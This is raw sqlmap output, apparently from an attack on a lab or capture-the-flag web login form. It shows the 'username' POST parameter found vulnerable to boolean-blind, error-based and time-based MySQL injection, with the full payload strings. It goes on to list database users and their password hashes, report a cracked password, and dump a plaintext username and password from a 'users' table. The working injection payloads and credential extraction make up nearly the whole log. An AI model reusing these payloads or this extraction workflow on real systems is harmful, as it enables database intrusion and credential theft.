[06:42:45] [INFO] POST parameter 'username' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="Got")
[06:42:46] [INFO] POST parameter 'username' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable 
[06:42:59] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 

---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=DNeU' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 0x444e6555 ELSE 0x28 END))-- YdvA&password=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: username=DNeU' AND GTID_SUBSET(CONCAT(0x7170707871,(SELECT (ELT(8201=8201,1))),0x71706a6a71),8201)-- Bocu&password=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=DNeU' AND (SELECT 2496 FROM (SELECT(SLEEP(5)))XmUX)-- iYFW&password=
---

[06:46:01] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.28-0ubuntu0.16.04.2'

database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'mysql.session'@'localhost'
[*] 'mysql.sys'@'localhost'
[*] 'root'@'localhost'


[06:46:22] [INFO] retrieved: 'debian-sys-maint'
[06:46:22] [INFO] retrieved: '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B'
[06:46:22] [INFO] retrieved: 'mysql.session'
[06:46:23] [INFO] retrieved: '*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE'
[06:46:23] [INFO] retrieved: 'mysql.sys'
[06:46:23] [INFO] retrieved: '*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE'
[06:46:23] [INFO] retrieved: 'root'
[06:46:24] [INFO] retrieved: '*82D1BDA2F1E16E0DAEE2412F1C6E8DE7DF8B84FD'


[06:47:20] [INFO] cracked password 'root' for user 'debian-sys-maint'                                                                              
[06:47:21] [INFO] cracked password 'root' for user 'debian-sys-maint'  


available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users


Database: users
[1 table]
+-------+
| users |
+-------+


Database: users
Table: users
[1 entry]
+------------+----------+
| password   | username |
+------------+----------+
| secretpass | pingudad |
+------------+----------+